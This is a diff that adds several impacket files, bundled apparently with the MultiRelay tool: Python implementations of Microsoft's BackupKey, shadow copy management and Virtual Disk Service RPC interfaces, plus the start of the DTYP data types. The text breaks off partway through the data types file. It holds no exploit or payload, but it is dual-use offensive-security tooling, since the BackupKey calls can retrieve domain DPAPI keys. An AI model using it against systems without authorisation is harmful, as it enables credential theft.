+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-BKRP] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+# ToDo:
+# [ ] 2.2.2 Client-Side-Wrapped Secret
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, NTSTATUS, GUID, RPC_SID, NULL
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import system_errors
+from impacket.uuid import uuidtup_to_bin, string_to_bin
+from impacket.structure import Structure
+
+MSRPC_UUID_BKRP = uuidtup_to_bin(('3dde7c30-165d-11d1-ab8f-00805f14db40', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] 
+            return 'BKRP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'BKRP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+BACKUPKEY_BACKUP_GUID = string_to_bin("7F752B10-178E-11D1-AB8F-00805F14DB40")
+BACKUPKEY_RESTORE_GUID_WIN2K = string_to_bin("7FE94D50-178E-11D1-AB8F-00805F14DB40")
+BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID = string_to_bin("018FF48A-EABA-40C6-8F6D-72370240E967")
+BACKUPKEY_RESTORE_GUID =  string_to_bin("47270C64-2FC7-499B-AC5B-0E37CDCE899A")
+
+################################################################################
+# STRUCTURES
+################################################################################
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', BYTE_ARRAY),
+    )
+
+# 2.2.4.1 Rc4EncryptedPayload Structure
+class Rc4EncryptedPayload(Structure):
+    structure = (
+        ('R3', '32s=""'),
+        ('MAC', '20s=""'),
+        ('SID', ':', RPC_SID),
+        ('Secret', ':'),
+    )
+
+# 2.2.4 Secret Wrapped with Symmetric Key
+class WRAPPED_SECRET(Structure):
+    structure = (
+        ('SIGNATURE', '<L=1'),
+        ('Payload_Length', '<L=0'),
+        ('Ciphertext_Length', '<L=0'),
+        ('GUID_of_Wrapping_Key', '16s=""'),
+        ('R2', '68s=""'),
+        ('_Rc4EncryptedPayload', '_-Rc4EncryptedPayload', 'self["Payload_Length"]'),
+        ('Rc4EncryptedPayload', ':'),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.1 BackuprKey(Opnum 0)
+class BackuprKey(NDRCALL):
+    opnum = 0
+    structure = (
+       ('pguidActionAgent', GUID),
+       ('pDataIn', BYTE_ARRAY),
+       ('cbDataIn', DWORD),
+       ('dwParam', DWORD),
+    )
+
+class BackuprKeyResponse(NDRCALL):
+    structure = (
+       ('ppDataOut', PBYTE_ARRAY),
+       ('pcbDataOut', DWORD),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (BackuprKey, BackuprKeyResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hBackuprKey(dce, pguidActionAgent, pDataIn, dwParam=0):
+    request = BackuprKey()
+    request['pguidActionAgent'] = pguidActionAgent
+    request['pDataIn'] = pDataIn
+    if pDataIn == NULL:
+        request['cbDataIn'] = 0
+    else:
+        request['cbDataIn'] = len(pDataIn)
+    request['dwParam'] = dwParam
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/__init__.py

@@ -0,0 +1 @@
+pass

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py

@@ -0,0 +1,337 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-SCMP]: Shadow Copy Management Protocol Interface implementation
+#              This was used as a way to test the DCOM runtime. Further 
+#              testing is needed to verify it is working as expected
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Since DCOM is like an OO RPC, instead of helper functions you will see the 
+#   classes described in the standards developed. 
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRENUM, NDRSTRUCT, NDRUNION
+from impacket.dcerpc.v5.dcomrt import PMInterfacePointer, INTERFACE, DCOMCALL, DCOMANSWER, IRemUnknown2
+from impacket.dcerpc.v5.dtypes import LONG, LONGLONG, ULONG, WSTR
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import hresult_errors
+from impacket.uuid import string_to_bin
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        if self.error_code in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] 
+            return 'SCMP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'SCMP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_ShadowCopyProvider = string_to_bin('0b5a2c52-3eb9-470a-96e2-6c6d4570e40f')
+IID_IVssSnapshotMgmt = string_to_bin('FA7DF749-66E7-4986-A27F-E2F04AE53772')
+IID_IVssEnumObject   = string_to_bin('AE1C7110-2F60-11d3-8A39-00C04F72D8E3')
+IID_IVssDifferentialSoftwareSnapshotMgmt = string_to_bin('214A0F28-B737-4026-B847-4F9E37D79529')
+IID_IVssEnumMgmtObject = string_to_bin('01954E6B-9254-4e6e-808C-C9E05D007696')
+IID_ShadowCopyProvider = string_to_bin('B5946137-7B9F-4925-AF80-51ABD60B20D5')
+
+# 2.2.1.1 VSS_ID
+class VSS_ID(NDRSTRUCT):
+    structure = (
+        ('Data','16s=b""'),
+    )
+
+    def getAlignment(self):
+        return 2
+
+#2.2.1.2 VSS_PWSZ
+VSS_PWSZ = WSTR
+
+# 2.2.1.3 VSS_TIMESTAMP
+VSS_TIMESTAMP = LONGLONG
+
+error_status_t = LONG
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1 VSS_OBJECT_TYPE Enumeration
+class VSS_OBJECT_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_OBJECT_UNKNOWN      = 0
+        VSS_OBJECT_NONE         = 1
+        VSS_OBJECT_SNAPSHOT_SET = 2
+        VSS_OBJECT_SNAPSHOT     = 3
+        VSS_OBJECT_PROVIDER     = 4
+        VSS_OBJECT_TYPE_COUNT   = 5
+
+# 2.2.2.2 VSS_MGMT_OBJECT_TYPE Enumeration
+class VSS_MGMT_OBJECT_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_MGMT_OBJECT_UNKNOWN     = 0
+        VSS_MGMT_OBJECT_VOLUME      = 1
+        VSS_MGMT_OBJECT_DIFF_VOLUME = 2
+        VSS_MGMT_OBJECT_DIFF_AREA   = 3
+
+# 2.2.2.3 VSS_VOLUME_SNAPSHOT_ATTRIBUTES Enumeration
+class VSS_VOLUME_SNAPSHOT_ATTRIBUTES(NDRENUM):
+    class enumItems(Enum):
+        VSS_VOLSNAP_ATTR_PERSISTENT        = 0x01
+        VSS_VOLSNAP_ATTR_NO_AUTORECOVERY   = 0x02
+        VSS_VOLSNAP_ATTR_CLIENT_ACCESSIBLE = 0x04
+        VSS_VOLSNAP_ATTR_NO_AUTO_RELEASE   = 0x08
+        VSS_VOLSNAP_ATTR_NO_WRITERS        = 0x10
+
+# 2.2.2.4 VSS_SNAPSHOT_STATE Enumeration
+class VSS_SNAPSHOT_STATE(NDRENUM):
+    class enumItems(Enum):
+        VSS_SS_UNKNOWN  = 0x01
+        VSS_SS_CREATED  = 0x0c
+
+# 2.2.2.5 VSS_PROVIDER_TYPE Enumeration
+class  VSS_PROVIDER_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_PROV_UNKNOWN  = 0
+
+# 2.2.3.7 VSS_VOLUME_PROP Structure
+class VSS_VOLUME_PROP(NDRSTRUCT):
+    structure = (
+        ('m_pwszVolumeName', VSS_PWSZ),
+        ('m_pwszVolumeDisplayName', VSS_PWSZ),
+    )
+
+# 2.2.3.5 VSS_MGMT_OBJECT_UNION Union
+class VSS_MGMT_OBJECT_UNION(NDRUNION):
+    commonHdr = (
+        ('tag', ULONG),
+    )
+    union = {
+        VSS_MGMT_OBJECT_TYPE.VSS_MGMT_OBJECT_VOLUME: ('Vol', VSS_VOLUME_PROP),
+        #VSS_MGMT_OBJECT_DIFF_VOLUME: ('DiffVol', VSS_DIFF_VOLUME_PROP),
+        #VSS_MGMT_OBJECT_DIFF_AREA: ('DiffArea', VSS_DIFF_AREA_PROP),
+    }
+
+# 2.2.3.6 VSS_MGMT_OBJECT_PROP Structure
+class VSS_MGMT_OBJECT_PROP(NDRSTRUCT):
+    structure = (
+        ('Type', VSS_MGMT_OBJECT_TYPE),
+        ('Obj', VSS_MGMT_OBJECT_UNION),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.3 IVssEnumMgmtObject Details
+
+# 3.1.3.1 Next (Opnum 3)
+class IVssEnumMgmtObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IVssEnumMgmtObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('rgelt', VSS_MGMT_OBJECT_PROP),
+       ('pceltFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.2.1 Next (Opnum 3)
+class IVssEnumObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IVssEnumObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('rgelt', VSS_MGMT_OBJECT_PROP),
+       ('pceltFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+
+class GetProviderMgmtInterface(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('ProviderId', VSS_ID),
+       ('InterfaceId', VSS_ID),
+    )
+
+class GetProviderMgmtInterfaceResponse(DCOMANSWER):
+    structure = (
+       ('ppItf', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+class QueryVolumesSupportedForSnapshots(DCOMCALL):
+    opnum = 4
+    structure = (
+       ('ProviderId', VSS_ID),
+       ('IContext', LONG),
+    )
+
+class QueryVolumesSupportedForSnapshotsResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+class QuerySnapshotsByVolume(DCOMCALL):
+    opnum = 5
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+       ('ProviderId', VSS_ID),
+    )
+
+class QuerySnapshotsByVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.4.4.5 QueryDiffAreasForVolume (Opnum 6)
+class QueryDiffAreasForVolume(DCOMCALL):
+    opnum = 6
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+    )
+
+class QueryDiffAreasForVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.4.4.6 QueryDiffAreasOnVolume (Opnum 7)
+class QueryDiffAreasOnVolume(DCOMCALL):
+    opnum = 7
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+    )
+
+class QueryDiffAreasOnVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+}
+
+################################################################################
+# HELPER FUNCTIONS AND INTERFACES
+################################################################################
+class IVssEnumMgmtObject(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssEnumMgmtObject
+
+    def Next(self, celt):
+        request = IVssEnumMgmtObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        resp = self.request(request, self._iid, uuid = self.get_iPid())
+        return resp 
+
+class IVssEnumObject(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssEnumObject
+
+    def Next(self, celt):
+        request = IVssEnumObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        dce = self.connect()
+        resp = dce.request(request, self._iid, uuid = self.get_iPid())
+        return resp 
+
+class IVssSnapshotMgmt(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssSnapshotMgmt
+
+    def GetProviderMgmtInterface(self, providerId = IID_ShadowCopyProvider, interfaceId = IID_IVssDifferentialSoftwareSnapshotMgmt):
+        req = GetProviderMgmtInterface()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['ProviderId'] = providerId
+        req['InterfaceId'] = interfaceId
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssDifferentialSoftwareSnapshotMgmt(INTERFACE(classInstance, ''.join(resp['ppItf']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+    def QueryVolumesSupportedForSnapshots(self, providerId, iContext):
+        req = QueryVolumesSupportedForSnapshots()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['ProviderId'] = providerId
+        req['IContext'] = iContext
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),target = self.get_target()))
+
+    def QuerySnapshotsByVolume(self, volumeName, providerId = IID_ShadowCopyProvider):
+        req = QuerySnapshotsByVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = volumeName
+        req['ProviderId'] = providerId
+        try:
+            resp = self.request(req, self._iid, uuid = self.get_iPid())
+        except DCERPCException as e:
+            print(e)
+            from impacket.winregistry import hexdump
+            data = e.get_packet()
+            hexdump(data)
+            kk = QuerySnapshotsByVolumeResponse(data)
+            kk.dump()
+        #resp.dump()
+        return IVssEnumObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+class IVssDifferentialSoftwareSnapshotMgmt(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssDifferentialSoftwareSnapshotMgmt
+
+    def QueryDiffAreasOnVolume(self, pwszVolumeName):
+        req = QueryDiffAreasOnVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = pwszVolumeName
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+    def QueryDiffAreasForVolume(self, pwszVolumeName):
+        req = QueryDiffAreasForVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = pwszVolumeName
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py

@@ -0,0 +1,267 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-VDS]: Virtual Disk Service (VDS) Protocol
+#             This was used as a way to test the DCOM runtime. Further 
+#             testing is needed to verify it is working as expected
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Since DCOM is like an OO RPC, instead of helper functions you will see the 
+#   classes described in the standards developed. 
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantVaryingArray, NDRENUM
+from impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown2, PMInterfacePointer, INTERFACE
+from impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, DWORD, SHORT, GUID
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.enum import Enum
+from impacket import hresult_errors
+from impacket.uuid import string_to_bin
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        if self.error_code in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] 
+            return 'VDS SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'VDS SessionError: unknown error code: 0x%x' % (self.error_code)
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_VirtualDiskService = string_to_bin('7D1933CB-86F6-4A98-8628-01BE94C9A575')
+IID_IEnumVdsObject = string_to_bin('118610B7-8D94-4030-B5B8-500889788E4E')
+IID_IVdsAdviseSink = string_to_bin('8326CD1D-CF59-4936-B786-5EFC08798E25')
+IID_IVdsAsync = string_to_bin('D5D23B6D-5A55-4492-9889-397A3C2D2DBC')
+IID_IVdsServiceInitialization = string_to_bin('4AFC3636-DB01-4052-80C3-03BBCB8D3C69')
+IID_IVdsService = string_to_bin('0818A8EF-9BA9-40D8-A6F9-E22833CC771E')
+IID_IVdsSwProvider = string_to_bin('9AA58360-CE33-4F92-B658-ED24B14425B8')
+IID_IVdsProvider = string_to_bin('10C5E575-7984-4E81-A56B-431F5F92AE42')
+
+error_status_t = ULONG
+
+# 2.2.1.1.3 VDS_OBJECT_ID
+VDS_OBJECT_ID = GUID
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1.3.1 VDS_SERVICE_PROP
+class VDS_SERVICE_PROP(NDRSTRUCT):
+    structure = (
+        ('pwszVersion',LPWSTR),
+        ('ulFlags',ULONG),
+    )
+
+class OBJECT_ARRAY(NDRUniConformantVaryingArray):
+    item = PMInterfacePointer
+
+# 2.2.2.7.1.1 VDS_PROVIDER_TYPE
+class VDS_PROVIDER_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VDS_PT_UNKNOWN     = 0
+        VDS_PT_SOFTWARE    = 1
+        VDS_PT_HARDWARE    = 2
+        VDS_PT_VIRTUALDISK = 3
+        VDS_PT_MAX         = 4
+
+# 2.2.2.7.2.1 VDS_PROVIDER_PROP
+class VDS_PROVIDER_PROP(NDRSTRUCT):
+    structure = (
+        ('id',VDS_OBJECT_ID),
+        ('pwszName',LPWSTR),
+        ('guidVersionId',GUID),
+        ('pwszVersion',LPWSTR),
+        ('type',VDS_PROVIDER_TYPE),
+        ('ulFlags',ULONG),
+        ('ulStripeSizeFlags',ULONG),
+        ('sRebuildPriority',SHORT),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# 3.4.5.2.5.1 IVdsServiceInitialization::Initialize (Opnum 3)
+class IVdsServiceInitialization_Initialize(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('pwszMachineName', LPWSTR),
+    )
+
+class IVdsServiceInitialization_InitializeResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.1 IVdsService::IsServiceReady (Opnum 3)
+class IVdsService_IsServiceReady(DCOMCALL):
+    opnum = 3
+    structure = (
+    )
+
+class IVdsService_IsServiceReadyResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.2 IVdsService::WaitForServiceReady (Opnum 4)
+class IVdsService_WaitForServiceReady(DCOMCALL):
+    opnum = 4
+    structure = (
+    )
+
+class IVdsService_WaitForServiceReadyResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.3 IVdsService::GetProperties (Opnum 5)
+class IVdsService_GetProperties(DCOMCALL):
+    opnum = 5
+    structure = (
+    )
+
+class IVdsService_GetPropertiesResponse(DCOMANSWER):
+    structure = (
+       ('pServiceProp', VDS_SERVICE_PROP),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.4 IVdsService::QueryProviders (Opnum 6)
+class IVdsService_QueryProviders(DCOMCALL):
+    opnum = 6
+    structure = (
+        ('masks', DWORD),
+    )
+
+class IVdsService_QueryProvidersResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.1.1 IEnumVdsObject Interface
+# 3.4.5.2.1.1 IEnumVdsObject::Next (Opnum 3)
+class IEnumVdsObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IEnumVdsObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('ppObjectArray', OBJECT_ARRAY),
+       ('pcFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+# 3.4.5.2.14.1 IVdsProvider::GetProperties (Opnum 3)
+class IVdsProvider_GetProperties(DCOMCALL):
+    opnum = 3
+    structure = (
+    )
+
+class IVdsProvider_GetPropertiesResponse(DCOMANSWER):
+    structure = (
+       ('pProviderProp', VDS_PROVIDER_PROP),
+       ('ErrorCode', error_status_t),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+}
+
+################################################################################
+# HELPER FUNCTIONS AND INTERFACES
+################################################################################
+class IEnumVdsObject(IRemUnknown2):
+    def Next(self, celt=0xffff):
+        request = IEnumVdsObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        try:
+            resp = self.request(request, uuid = self.get_iPid())
+        except Exception as e:
+            resp = e.get_packet()
+            # If it is S_FALSE(1) means less items were returned
+            if resp['ErrorCode'] != 1:
+                raise
+        interfaces = list()
+        for interface in resp['ppObjectArray']:
+            interfaces.append(IRemUnknown2(INTERFACE(self.get_cinstance(), ''.join(interface['abData']), self.get_ipidRemUnknown(), target = self.get_target())))
+        return interfaces
+
+class IVdsProvider(IRemUnknown2):
+    def GetProperties(self):
+        request = IVdsProvider_GetProperties()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+class IVdsServiceInitialization(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+
+    def Initialize(self):
+        request = IVdsServiceInitialization_Initialize()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['pwszMachineName'] = '\x00'
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+class IVdsService(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+
+    def IsServiceReady(self):
+        request = IVdsService_IsServiceReady()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        try:
+            resp = self.request(request, uuid = self.get_iPid())
+        except Exception as e:
+            resp = e.get_packet()
+        return resp 
+
+    def WaitForServiceReady(self):
+        request = IVdsService_WaitForServiceReady()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+    def GetProperties(self):
+        request = IVdsService_GetProperties()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+    def QueryProviders(self, masks):
+        request = IVdsService_QueryProviders()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['masks'] = masks
+        resp = self.request(request, uuid = self.get_iPid())
+        return IEnumVdsObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py

@@ -0,0 +1,542 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-DTYP] Interface mini implementation
+#
+from __future__ import division
+from __future__ import print_function
+from struct import pack
+from six import binary_type
+
+from impacket.dcerpc.v5.ndr import NDRULONG, NDRUHYPER, NDRSHORT, NDRLONG, NDRPOINTER, NDRUniConformantArray, \
+    NDRUniFixedArray, NDR, NDRHYPER, NDRSMALL, NDRPOINTERNULL, NDRSTRUCT, \
+    NDRUSMALL, NDRBOOLEAN, NDRUSHORT, NDRFLOAT, NDRDOUBLEFLOAT, NULL
+
+DWORD = NDRULONG
+BOOL = NDRULONG
+UCHAR = NDRUSMALL
+SHORT = NDRSHORT
+NULL = NULL
+
+class LPDWORD(NDRPOINTER):
+    referent = (
+        ('Data', DWORD),
+    )
+
+class PSHORT(NDRPOINTER):
+    referent = (
+        ('Data', SHORT),
+    )
+
+class PBOOL(NDRPOINTER):
+    referent = (
+        ('Data', BOOL),
+    )
+
+class LPBYTE(NDRPOINTER):
+    referent = (
+        ('Data', NDRUniConformantArray),
+    )
+PBYTE = LPBYTE
+
+# 2.2.4 BOOLEAN
+BOOLEAN = NDRBOOLEAN
+
+# 2.2.6 BYTE
+BYTE = NDRUSMALL
+
+# 2.2.7 CHAR
+CHAR = NDRSMALL
+class PCHAR(NDRPOINTER):
+    referent = (
+        ('Data', CHAR),
+    )
+
+class WIDESTR(NDRUniFixedArray):
+    def getDataLen(self, data, offset=0):
+        return data.find(b'\x00\x00\x00', offset)+3-offset
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                self.fields[key] = value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            return self.fields[key].decode('utf-16le')
+        else:
+            return NDR.__getitem__(self,key)
+
+class STR(NDRSTRUCT):
+    commonHdr = (
+        ('MaximumCount', '<L=len(Data)'),
+        ('Offset','<L=0'),
+        ('ActualCount','<L=len(Data)'),
+    )
+    commonHdr64 = (
+        ('MaximumCount', '<Q=len(Data)'),
+        ('Offset','<Q=0'),
+        ('ActualCount','<Q=len(Data)'),
+    )
+    structure = (
+        ('Data',':'),
+    )
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+        # Here just print the data
+        print(" %r" % (self['Data']), end=' ')
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                if not isinstance(value, binary_type):
+                    self.fields[key] = value.encode('utf-8')
+                else:
+                    # if it is a binary type (str in Python 2, bytes in Python 3), then we assume it is a raw buffer
+                    self.fields[key] = value
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-8')
+            self.fields['MaximumCount'] = None
+            self.fields['ActualCount'] = None
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            try:
+                return self.fields[key].decode('utf-8')
+            except UnicodeDecodeError:
